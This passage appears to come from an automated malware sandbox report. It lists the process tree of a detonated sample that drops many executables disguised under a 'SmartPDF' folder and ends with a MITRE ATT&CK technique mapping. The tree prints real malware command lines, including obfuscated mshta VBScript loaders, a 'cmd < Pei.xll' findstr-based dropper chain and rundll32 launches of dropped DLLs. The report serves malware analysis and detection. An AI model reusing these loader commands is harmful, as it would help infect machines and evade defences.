      - C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe
        
        "C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe"
        6⤵
        
        PID:29980
      - C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe
        
        "C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe"
        6⤵
        
        PID:20860
      - C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe
        
        "C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe"
        6⤵
        
        PID:31016
      - C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe
        
        "C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe"
        6⤵
        
        PID:31792
      - C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe
        
        "C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe"
        6⤵
        
        PID:4036
    - - C:\Program Files (x86)\SmartPDF\SmartPDF\PBrowFile15.exe
        
        "C:\Program Files (x86)\SmartPDF\SmartPDF\PBrowFile15.exe"
        5⤵
        
        PID:6368
      - C:\Users\Admin\AppData\Roaming\5828360.exe
        
        "C:\Users\Admin\AppData\Roaming\5828360.exe"
        6⤵
        
        PID:5748
      - C:\Users\Admin\AppData\Roaming\3848172.exe
        
        "C:\Users\Admin\AppData\Roaming\3848172.exe"
        6⤵
        
        PID:9032
      - C:\Users\Admin\AppData\Roaming\6630412.exe
        
        "C:\Users\Admin\AppData\Roaming\6630412.exe"
        6⤵
        
        PID:408
      - C:\Users\Admin\AppData\Roaming\7529617.exe
        
        "C:\Users\Admin\AppData\Roaming\7529617.exe"
        6⤵
        
        PID:8672
      - C:\Users\Admin\AppData\Roaming\7110906.exe
        
        "C:\Users\Admin\AppData\Roaming\7110906.exe"
        6⤵
        
        PID:8748
    - - C:\Program Files (x86)\SmartPDF\SmartPDF\stats.exe
        
        "C:\Program Files (x86)\SmartPDF\SmartPDF\stats.exe" /Verysilent
        5⤵
        
        PID:6564
      - C:\Users\Admin\AppData\Local\Temp\is-UINJA.tmp\stats.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-UINJA.tmp\stats.tmp" /SL5="$502F2,138429,56832,C:\Program Files (x86)\SmartPDF\SmartPDF\stats.exe" /Verysilent
        6⤵
        
        PID:7000
        
        C:\Users\Admin\AppData\Local\Temp\is-OPVQE.tmp\Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-OPVQE.tmp\Setup.exe" /Verysilent
        7⤵
        
        PID:10992
    - - C:\Program Files (x86)\SmartPDF\SmartPDF\note866.exe
        
        "C:\Program Files (x86)\SmartPDF\SmartPDF\note866.exe"
        5⤵
        
        PID:6552
    - - C:\Program Files (x86)\SmartPDF\SmartPDF\LivelyScreenRecS3.0.exe
        
        "C:\Program Files (x86)\SmartPDF\SmartPDF\LivelyScreenRecS3.0.exe"
        5⤵
        
        PID:6468
      - C:\Users\Admin\AppData\Local\Temp\tmpDCFE_tmp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\tmpDCFE_tmp.exe"
        6⤵
        
        PID:9680
        
        C:\Windows\SysWOW64\dllhost.exe
        
        dllhost.exe
        7⤵
        
        PID:10072
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c cmd < Pei.xll
        7⤵
        
        PID:7748
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd
        8⤵
        
        PID:10888
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /V /R "^HlGEvpOWJOEhLjtMCMDsxiaRDGubGurupaMHjGXUgfrcGybsXUFbdIsmSOwQrdfCLnrzmbAVPJrtrXlnpOAMBGPBqjObFuRXZBJowtRmxKIHEjcVEDHgPDwyIBahIedISyy$" Passa.xll
        9⤵
        
        PID:14884
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping localhost
        9⤵
        Runs ping.exe
        
        PID:16500
        
        C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tra.exe.com
        
        Tra.exe.com o
        9⤵
        
        PID:16348
        
        C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tra.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tra.exe.com o
        10⤵
        
        PID:7444
        
        C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tra.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tra.exe.com o
        11⤵
        
        PID:24976
        
        C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tra.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tra.exe.com o
        12⤵
        
        PID:27960
    - - C:\Program Files (x86)\SmartPDF\SmartPDF\lg.exe
        
        "C:\Program Files (x86)\SmartPDF\SmartPDF\lg.exe"
        5⤵
        
        PID:6444
      - C:\Program Files (x86)\SmartPDF\SmartPDF\lg.exe
        
        "C:\Program Files (x86)\SmartPDF\SmartPDF\lg.exe" -a
        6⤵
        
        PID:6288
- C:\Users\Admin\Documents\YUQ5j_75agRM_NRDccHlDxGg.exe
  "C:\Users\Admin\Documents\YUQ5j_75agRM_NRDccHlDxGg.exe"
  2⤵
  - Executes dropped EXE
  PID:2732
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2732 -s 656
    3⤵
    - Executes dropped EXE
    - Program crash
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4724
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2732 -s 672
    3⤵
    - Program crash
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:5208
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2732 -s 680
    3⤵
    - Program crash
    - Suspicious use of AdjustPrivilegeToken
    PID:5696
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2732 -s 696
    3⤵
    - Program crash
    PID:5580
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2732 -s 1036
    3⤵
    - Program crash
    PID:7140
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2732 -s 1064
    3⤵
    - Program crash
    PID:6540
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2732 -s 1244
    3⤵
    - Program crash
    PID:7920
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2732 -s 1268
    3⤵
    - Program crash
    PID:7916
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2732 -s 1368
    3⤵
    - Program crash
    PID:8492
- C:\Users\Admin\Documents\o73cE_DGFtlAS264RWVwVHyE.exe
  "C:\Users\Admin\Documents\o73cE_DGFtlAS264RWVwVHyE.exe"
  2⤵
  - Executes dropped EXE
  PID:3564
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\KBAvfsr.exe
    "C:\Users\Admin\AppData\Local\Temp\RarSFX0\KBAvfsr.exe"
    3⤵
    - Executes dropped EXE
    PID:5044
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5044 -s 216
      4⤵
      Program crash
      PID:9708
- C:\Users\Admin\Documents\f5_UmgjsIjulvakrY8mXuzA0.exe
  "C:\Users\Admin\Documents\f5_UmgjsIjulvakrY8mXuzA0.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:3184
- - C:\Users\Admin\Documents\f5_UmgjsIjulvakrY8mXuzA0.exe
    "C:\Users\Admin\Documents\f5_UmgjsIjulvakrY8mXuzA0.exe"
    3⤵
    - Executes dropped EXE
    - Checks SCSI registry key(s)
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    PID:4164
- C:\Users\Admin\Documents\xpbF5cnoinmfY1WWoAN3P9qW.exe
  "C:\Users\Admin\Documents\xpbF5cnoinmfY1WWoAN3P9qW.exe"
  2⤵
  - Executes dropped EXE
  PID:4124
- - C:\Windows\SysWOW64\mshta.exe
    "C:\Windows\System32\mshta.exe" VbsCrIPt: cLOSe( CREAteobjecT ("wScRiPT.ShElL" ).RUN ( "C:\Windows\system32\cmd.exe /C tYpe ""C:\Users\Admin\Documents\xpbF5cnoinmfY1WWoAN3P9qW.exe"" > IQ0V_Fe_.eXE && StaRt IQ0v_FE_.ExE -poRsuYEMryiLi & if """"== """" for %m in ( ""C:\Users\Admin\Documents\xpbF5cnoinmfY1WWoAN3P9qW.exe"" ) do taskkill /iM ""%~NXm"" -F" ,0 , TRUE ))
    3⤵
    PID:4800
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /C tYpe "C:\Users\Admin\Documents\xpbF5cnoinmfY1WWoAN3P9qW.exe" > IQ0V_Fe_.eXE && StaRt IQ0v_FE_.ExE -poRsuYEMryiLi& if ""== "" for %m in ("C:\Users\Admin\Documents\xpbF5cnoinmfY1WWoAN3P9qW.exe" ) do taskkill /iM "%~NXm" -F
      4⤵
      PID:5644
    - - C:\Users\Admin\AppData\Local\Temp\IQ0V_Fe_.eXE
        
        IQ0v_FE_.ExE -poRsuYEMryiLi
        5⤵
        
        PID:4868
      - C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" VbsCrIPt: cLOSe( CREAteobjecT ("wScRiPT.ShElL" ).RUN ( "C:\Windows\system32\cmd.exe /C tYpe ""C:\Users\Admin\AppData\Local\Temp\IQ0V_Fe_.eXE"" > IQ0V_Fe_.eXE && StaRt IQ0v_FE_.ExE -poRsuYEMryiLi & if ""-poRsuYEMryiLi""== """" for %m in ( ""C:\Users\Admin\AppData\Local\Temp\IQ0V_Fe_.eXE"" ) do taskkill /iM ""%~NXm"" -F" ,0 , TRUE ))
        6⤵
        
        PID:3724
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /C tYpe "C:\Users\Admin\AppData\Local\Temp\IQ0V_Fe_.eXE" > IQ0V_Fe_.eXE && StaRt IQ0v_FE_.ExE -poRsuYEMryiLi& if "-poRsuYEMryiLi"== "" for %m in ("C:\Users\Admin\AppData\Local\Temp\IQ0V_Fe_.eXE" ) do taskkill /iM "%~NXm" -F
        7⤵
        Blocklisted process makes network request
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of FindShellTrayWindow
        
        PID:4180
      - C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" VHTDDahA.G,XBvVyh
        6⤵
        
        PID:8456
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /iM "xpbF5cnoinmfY1WWoAN3P9qW.exe" -F
        5⤵
        Kills process with taskkill
        
        PID:6948

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 8148 -s 24
1⤵
- Program crash
PID:5084

C:\Windows\system32\rUNdlL32.eXe
rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
1⤵
- Process spawned unexpected child process
PID:6344
- C:\Windows\SysWOW64\rundll32.exe
  rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
  2⤵
  PID:8772

C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
PID:6956

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:10568

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k SystemNetworkService
1⤵
PID:10552

C:\Users\Admin\AppData\Roaming\wgihctg
C:\Users\Admin\AppData\Roaming\wgihctg
1⤵
PID:21320
- C:\Users\Admin\AppData\Roaming\wgihctg
  C:\Users\Admin\AppData\Roaming\wgihctg
  2⤵
  PID:25992

C:\Windows\system32\WerFault.exe
"C:\Windows\system32\WerFault.exe" -k -lc PoW32kWatchdog PoW32kWatchdog-20210831-2004.dm
1⤵
PID:23608

C:\Users\Admin\AppData\Roaming\wgihctg
C:\Users\Admin\AppData\Roaming\wgihctg
1⤵
PID:29636

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Scheduled Task

Privilege Escalation

Scheduled Task

Defense Evasion

Disabling Security Tools

T1089

Modify Registry

T1112

Virtualization/Sandbox Evasion

T1497

Web Service

T1102

Credential Access

Credentials in Files

T1081

Discovery

Peripheral Device Discovery

T1120

Query Registry

Remote System Discovery

T1018

System Information Discovery